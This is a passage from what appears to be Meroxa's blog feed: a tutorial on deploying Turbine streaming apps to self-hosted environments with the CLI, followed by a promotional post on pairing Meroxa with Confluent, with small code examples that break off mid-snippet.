&lt;p&gt;We know that with the need for data security and compliance becoming more critical, teams often have to choose between speed (time to deploy) or compliance (minimizing risk with sensitive data). Data isolation is a critical component of any data streaming application, as it helps to ensure the accuracy and reliability of data processing while also enhancing data security. At Meroxa, we&apos;ve done the work to eliminate implementation complexity while still offering complete operational control over your data security, compliance, and performance needs.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Getting started with Environments&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;First, you&apos;ll need access to the Self-hosted Environments Beta to get started. Request access with the link below:
&lt;strong&gt;&lt;a href=&quot;https://share.hsforms.com/1Uq6UYoL8Q6eV5QzSiyIQkAc2sme?__hstc=259081301.cdacee58365583db3016c560d11d6219.1655352845830.1682966540713.1683049264789.265&amp;#x26;__hssc=259081301.1.1683049264789&amp;#x26;__hsfp=3887566761&quot;&gt;Sign up for the Self-hosted Environments Beta&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;A member of our team will reach out with the next steps. You will need access to your cloud provider to generate credentials with the necessary permissions to provision an environment. For more information on how to set up your Environment, refer to our &lt;a href=&quot;https://docs.meroxa.com/platform/environments/aws-self-hosted/setup&quot;&gt;setup documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Creating an Environment&lt;/h3&gt;
&lt;p&gt;You can provision a Self Hosted Environment through our dashboard in the &lt;strong&gt;Environments tab &gt; Create Environment&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-21-1316-PM.png&quot; alt=&quot;Turbine + Environments: Create a new environment&quot;&gt;&lt;/p&gt;
&lt;p&gt;Or through our &lt;strong&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;CLI&lt;/a&gt;&lt;/strong&gt;. As part of the environment provisioning process, credentials from your cloud provider with the appropriate permissions are required.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa &lt;span class=&quot;token function&quot;&gt;env&lt;/span&gt; create my-env &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; selfhosted &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--provider&lt;/span&gt; aws &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--config&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;aws_access_key_id&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token variable&quot;&gt;$AWS_ACCESS_ID&lt;/span&gt;&quot;&lt;/span&gt;, &lt;span class=&quot;token string&quot;&gt;&quot;aws_secret_access_key&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&lt;span class=&quot;token variable&quot;&gt;$AWS_SECRET_KEY&lt;/span&gt;&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The Meroxa Platform will perform a preflight check to verify permissions before generating a new VPC and the associated dependencies in your cloud. A secure remote connection will be maintained automatically with the Meroxa platform for the control plane to ensure everything operates smoothly.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-22-1963-PM.png&quot; alt=&quot;Turbine + Environments: Environment summary&quot;&gt;&lt;/p&gt;
&lt;p&gt;Once successfully provisioned, you are ready to start creating Resources and build Turbine apps within your Self-hosted Environment.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Create a resource&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In order for a Turbine streaming application to securely connect with a data source or destination, one or more Meroxa Resources must be created. The resource must be added to the environment for it to be accessible. Resources created in the common environment will not be accessible in your environments.&lt;/p&gt;
&lt;p&gt;You can add a Meroxa resource via the dashboard under &lt;strong&gt;Resources tab &gt; Add Resource.&lt;/strong&gt; Under the environment dropdown, select the environment to create the resource in.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-21-4691-PM.png&quot; alt=&quot;Turbine + Environments: Add a resource&quot;&gt;&lt;/p&gt;
&lt;p&gt;You can also do this via our CLI.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;#&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;Create a resource&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create my-postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--env&lt;/span&gt; my-env &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; postgres://user:password@host.example.com:5432/db_name&lt;/span&gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using the ‘--env’ flag in the CLI allows you to indicate which environment to create resources in. The default environment is common.&lt;/p&gt;
&lt;p&gt;Once you’ve added your resources, you’re now ready to build your Turbine app! If you need help, check out our &lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart&quot;&gt;Quickstart Guide&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Building a Turbine streaming application&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In the example below we will build a Turbine JavaScript application and deploy it to our Environment. Other languages such as Python, Ruby, and Go are also supported. Initialize the streaming app within the local directory you are currently in by running the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init myapp &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You may define a different local directory path for the app project by using --path /your/local/path/ in your command. A local app project directory will automatically be created on your local machine, complete with everything you need to build a streaming app. Open your Turbine project and look for the app.js file. This is where you will be writing your Turbine streaming application code. It should already contain a basic boilerplate like below to get started.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-21-8272-PM.png&quot; alt=&quot;Turbine + Environments: CLI&quot;&gt;&lt;/p&gt;
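&lt;p&gt;For reference, the generated boilerplate follows roughly this shape. The resource and collection names are placeholders for the resources you created on the platform, and the exact method names may vary between Turbine versions:&lt;/p&gt;

```javascript
// Approximate shape of a generated Turbine JavaScript app.
// "source_name", "destination_name", and "collection_name" are placeholders;
// replace them with the friendly names of your own Meroxa resources.
class App {
  async run(turbine) {
    // Look up the upstream resource by its friendly name
    const source = await turbine.resources("source_name");
    // Pull records from a collection (e.g. a table or topic)
    const records = await source.records("collection_name");
    // Apply the transform function to the stream of records
    const transformed = await turbine.process(records, this.transform);
    // Write the transformed records to the downstream resource
    const destination = await turbine.resources("destination_name");
    await destination.write(transformed, "collection_name");
  }

  transform(records) {
    // Modify records here; this sketch passes them through unchanged.
    return records;
  }
}

exports.App = App;
```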
&lt;p&gt;In the next section, we will deploy the example app to our environment.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Deploying a Turbine streaming application in a Self Hosted Environment&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Before deploying your application, ensure the resources used by your Turbine data app exist on the Meroxa Platform. You can check using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Dashboard&lt;/a&gt; or the CLI by running the meroxa resources list command, which lists all resources and their state. If the resources don&apos;t exist, you must configure your resources using the Meroxa &lt;a href=&quot;https://dashboard.meroxa.io/resources/new&quot;&gt;Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The Turbine framework uses git for version control. Upon initializing your application, git init is performed locally on your behalf. This creates a new repository in the project folder of your Turbine data app, which can be used to track your code. You will need to commit your code changes before deploying.&lt;/p&gt;
&lt;p&gt;Using the Meroxa CLI, run the meroxa apps deploy command in the project folder root of your Turbine data app to start the deployment process.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy &lt;span class=&quot;token parameter variable&quot;&gt;--env&lt;/span&gt; my-env&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using the ‘--env’ flag in the CLI allows you to indicate which environment to deploy your application to; by default, the application will be deployed to the Common Environment.&lt;/p&gt;
&lt;p&gt;The Meroxa CLI will print out the steps taken and confirm once deployment is successful. You can view your newly deployed application in the dashboard or via the CLI. For a more detailed walkthrough of deploying a Turbine application to an environment, refer to our &lt;a href=&quot;https://docs.meroxa.com/turbine/deployment&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Viewing your newly created application&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In the dashboard, you can view your newly created application in your environment under the Apps tab.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Google%20Drive%20Integration/Turbine%20+%20Environments-May-08-2023-10-21-20-8692-PM.png&quot; alt=&quot;Turbine + Environments: Dashboard&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the CLI, you can run the command below to list and view your applications.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app &lt;span class=&quot;token function&quot;&gt;ls&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;UUID         NAME        LANGUAGE   GIT SHA   STATE   ENVIRONMENT 
====== ================ ========== ========= ======= =============
8ed...     my-app       javascript   ad87... running    my-env &lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;joining our Discord community server&lt;/a&gt;. We&apos;re excited to see what you build 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Build Real-Time Data Apps Faster with Confluent + Meroxa]]></title><description><![CDATA[Learn how Meroxa's data platform can improve your time to value and enhance your experience when working with Confluent.]]></description><link>https://meroxa.com/blog/build-real-time-data-apps-faster-with-confluent-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/build-real-time-data-apps-faster-with-confluent-meroxa</guid><dc:creator><![CDATA[Keith Haller]]></dc:creator><pubDate>Thu, 27 Apr 2023 19:46:04 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s data-driven world, building and working with data products can be challenging. It requires profound technical knowledge and may even demand an infrastructure overhaul of existing systems. Meroxa’s code-first approach and infrastructure abstraction are key to effectively leveraging your existing infrastructure and engineering team. This can simplify complexity, promote efficiency, reusability, and customization.&lt;/p&gt;
&lt;p&gt;In this blog post, we will explore how Meroxa&apos;s data platform can enhance your experience when working with Confluent. By utilizing a code-first approach and infrastructure abstraction, we can significantly shorten your investment time from months to minutes and boost the value of your existing investment.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Code-first approach&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Taking a code-first approach allows data stakeholders to build upon their established knowledge and collective expertise. Meroxa&apos;s Turbine framework is designed with developers in mind, providing a rich local development experience that enables the best practices of software engineering processes and workflows. It allows unparalleled customizability and flexibility when working with Confluent, without the need for deep technical expertise.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lower the bar to entry and fast start:&lt;/strong&gt; One of the main benefits of using Meroxa with Confluent Cloud is that it enables your existing teams to rapidly adopt Confluent and Kafka technologies without extensive training or external support. Meroxa simplifies the process of building stream processing applications. For example: (1) developers work with familiar languages and tooling; (2) environment setup is simplified; (3) logging and monitoring can be implemented with the tool of your choice; and (4) a proven software workflow for building and testing the application eliminates the need to develop your own. This allows the focus to be on working with the data rather than on the underlying complexities of your data infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Leverage your existing SDLC workflow and tooling:&lt;/strong&gt; Meroxa enables you to leverage your existing Software Development Life Cycle (SDLC) workflow and tooling while offering ease of scalability, multiple environments, Git support, CI/CD integrations, etc. Meroxa&apos;s developer workflows, refined over years of software engineering best practices, provide tooling and support often missing from today&apos;s data projects. With Meroxa you can establish enterprise-wide best practices with Confluent. This increases collaboration and efficiency while maintaining the flexibility and customizability necessary for success in data engineering tasks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Choose any language:&lt;/strong&gt; Developers can create stream processing applications and pipelines using their programming language of choice (Python, Go, JavaScript, Ruby, etc.), while taking advantage of existing libraries and packages within those languages. By empowering developers with familiar languages and tools, a code-first approach fosters efficiency, reusability, and customization, maximizing the potential of the developer team and saving time and resources.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Infrastructure Abstraction&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Infrastructure abstraction is a key feature of the Meroxa Data Platform, streamlining complex data technologies and making them more accessible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;No rip and replace; sits alongside your existing infrastructure:&lt;/strong&gt; Typically, integrating new data tooling can be disruptive and costly as it requires the development team to re-engineer their data processing pipelines, to learn new programming paradigms, and to adjust their monitoring and management practices. Meroxa sits alongside your existing infrastructure and integrates seamlessly with your current systems. The resource catalog abstracts the complexities and idiosyncrasies of the supported resource types and presents a simple, unified way to consume data from and/or push data to the resource via a common name.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Allows your team to focus on driving business value:&lt;/strong&gt; By adopting a code-first approach, Meroxa simplifies the connection process to various resources, supporting the connection of Confluent streams to any destination and vice versa. This freedom of connectors and rapid development capabilities enable developers to deploy fully functioning, production-grade data products in minutes rather than months. Once resources have been onboarded, they are made available for use via friendly names, with implementation details such as connection strings, authentication mechanisms, connector configurations, data formats, and connectivity details abstracted away. This lowers the barriers to entry for building data streams, allowing any data stakeholder to efficiently utilize the data without wrestling with the complexities of the given resource.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automates the operation of the underlying infrastructure:&lt;/strong&gt; Meroxa automates the management of underlying infrastructure, making it easier for developers to focus on their core tasks. Meroxa provides end-to-end automation, handling everything from packaging user-defined custom code to deploying it to any cloud or on-premises environment. Meroxa provisions and configures the required connectors and integrates them with the custom code to create a seamless system. As traffic patterns fluctuate, the platform intelligently scales function nodes to accommodate changes in demand. Furthermore, Meroxa&apos;s self-healing capabilities ensure that any issues with components are promptly addressed, maintaining the stability and reliability of the system.&lt;/p&gt;
&lt;h2&gt;Meroxa + Confluent = More Value, Less Investment and Months to Minutes&lt;/h2&gt;
&lt;p&gt;Confluent provides a framework for data in motion, and the partnership with Meroxa engages business developers with self-service capabilities that boost the value of the solution and can greatly reduce time to value, from months to minutes. Please see the illustrations below. Meroxa’s approach generates greater value for Confluent clients with much less investment in much less time.&lt;/p&gt;
&lt;p&gt;Confluent Cloud and Meroxa users do not have to deploy and manage the infrastructure for the stream processing application, allowing developers to build faster pipelines, without having to first solve infrastructure complexities. Meroxa offers a native integration into Confluent Cloud, not just self-hosted Kafka, allowing any data stakeholder to work effortlessly with Confluent Cloud.&lt;/p&gt;
&lt;p&gt;Additionally, Meroxa enables streaming data into Confluent from any source, sending data from Confluent to any destination, and working with Confluent data in any format.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confluent time to value curve&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://www.confluent.io/blog/data-in-motion-with-confluent-and-apache-kafka/&quot;&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Confluent%20Value%20Curve%20Image.png&quot; alt=&quot;Confluent Value Curve Image&quot;&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confluent time to value accelerates with Meroxa&lt;/strong&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Confluent%20+%20Meroxa%20Time%20to%20Value%20Curve.png&quot; alt=&quot;Confluent + Meroxa Time to Value Curve&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Simple pipeline builds&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa enables developers to quickly iterate and build simple pipelines by providing a rich local development experience, allowing developers of any skill level to test hypotheses on data projects and reducing the complexity of working with data.&lt;/p&gt;
&lt;p&gt;By allowing users to &quot;sample&quot; Confluent Streams, developers can rapidly test new data locally before committing to larger initiatives. This approach enables organizations to decide faster which projects deserve time and resources: in short, to test before investing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Easy Pipelining&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Meroxa brings software engineering best practices such as native support for Git and collaboration tools, allowing organizations to extend their software development processes and workflows to encapsulate data engineering.&lt;/p&gt;
&lt;p&gt;Moreover, users can integrate packages and custom code modules, allowing for simple reuse of code within the organization and use of external 3rd party modules. By providing these features, Meroxa enables Confluent users to increase collaboration and efficiency, while maintaining the flexibility and customizability necessary for success in data engineering tasks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Platform Effects&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Meroxa enables Confluent users to reuse tested and proven departmental pipelines at an enterprise-wide level, follow enterprise-wide best practices, and benefit from CI/CD integrations and consolidated monitoring of pipelines. The platform also offers ease of scalability and multiple environments (development, testing, staging, and production) that are designed to serve specific purposes.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Enriching real-time data streams without Meroxa Turbine&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Enriching real-time data in Confluent without Meroxa requires using Kafka Streams or ksqlDB to implement your stream-processing logic.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kafka Streams:&lt;/strong&gt; With Kafka Streams, you would typically write a Java or Scala application using the Kafka Streams library. In your application, you would define your processing logic, for example: joining the source topic with other topics containing enrichment data, or filtering and aggregating the data. Additionally, you would need to deploy the application to a suitable environment, and once it is deployed, set up logging and monitoring as well. Furthermore, you would also need to establish a workflow for building and testing the application.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ksqlDB:&lt;/strong&gt; With ksqlDB, you would write a series of ksqlDB statements to define your stream-processing logic. This includes creating streams and tables, performing joins between streams and tables, filtering, and aggregating data.&lt;/p&gt;
&lt;p&gt;Using Kafka Streams or ksqlDB for enriching real-time data streams can present challenges, depending on your use case and team expertise:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Steep learning curve&lt;/strong&gt;: Both Kafka Streams and ksqlDB have a steep learning curve, especially for those who are new to Kafka and stream-processing concepts. Developers need to familiarize themselves with the libraries and APIs, as well as the concepts of stream processing, such as windowing and stateful processing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Language limitations&lt;/strong&gt;: Kafka Streams only allows applications to be written in Java or Scala, which may not be ideal for teams with expertise in other programming languages. While ksqlDB offers a more accessible SQL-like language, it may still require some knowledge of the ksqlDB-specific syntax and features. Moreover, there are limitations to using SQL, as certain tasks cannot be accomplished using this language alone. For example, if you need to interact with a third-party API for data enrichment, or import a specific package to perform image manipulation, SQL would not be sufficient. In such cases, developers must resort to alternative approaches to address these complex requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Complexity&lt;/strong&gt;: Implementing stream-processing logic using Kafka Streams or ksqlDB can be complex, particularly when dealing with stateful processing, joins, and windowing operations. This complexity may lead to a longer development cycle and increased potential for errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability and performance&lt;/strong&gt;: Ensuring that your Kafka Streams applications or ksqlDB queries scale well and perform efficiently may require additional expertise in tuning and optimizing Kafka and the underlying infrastructure.&lt;/li&gt;
&lt;/ol&gt;
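&lt;p&gt;To make the &quot;windowing and stateful processing&quot; point concrete, here is a tiny plain-Python sketch of a tumbling-window count: the kind of state a stream-processing framework has to track for you. This is illustrative only; it is not Kafka Streams or ksqlDB code, and all names in it are made up:&lt;/p&gt;

```python
from collections import defaultdict

def tumbling_window_counts(events, window_size_s):
    """Count events per key in fixed, non-overlapping time windows.

    events: iterable of (timestamp_seconds, key) pairs.
    Returns a dict mapping (window_start, key) -> count.
    """
    counts = defaultdict(int)
    for timestamp, key in events:
        # Each event falls into exactly one window, aligned to window_size_s
        window_start = (timestamp // window_size_s) * window_size_s
        counts[(window_start, key)] += 1
    return dict(counts)
```

In a real streaming system this state must also survive restarts, handle late or out-of-order events, and be partitioned across workers, which is where much of the complexity comes from.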
&lt;h3&gt;Enrich real time data streams with Meroxa Turbine&lt;/h3&gt;
&lt;p&gt;Enriching real-time data with Meroxa’s Turbine framework is simpler: you connect your data streams and implement your processing logic in the language of your choice. When implementing the processing logic, you can leverage libraries, packages, and APIs you are already familiar with and that have been rigorously tested by millions of software developers.&lt;/p&gt;
&lt;p&gt;Here’s a simple example of enriching a data stream using Turbine &lt;code class=&quot;language-text&quot;&gt;JavaScript&lt;/code&gt; where we convert temperature values from Celsius to Fahrenheit in a stream of weather data:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token function&quot;&gt;processDataStream&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// Use record `get` and `set` to read and write to your data&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; temperatureCelsius &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;temperature_celsius&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;temperatureCelsius &lt;span class=&quot;token operator&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;undefined&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; temperatureFahrenheit &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;temperatureCelsius &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;32&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;temperature_fahrenheit&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; temperatureFahrenheit&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is another example of enriching a data stream using Turbine &lt;code class=&quot;language-text&quot;&gt;Python&lt;/code&gt; using the &lt;code class=&quot;language-text&quot;&gt;datetime&lt;/code&gt; package, where we prepend a timestamp to each line of a log file:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; datetime

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;prepend_timestamp&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Prepend timestamp to each log line&lt;/span&gt;
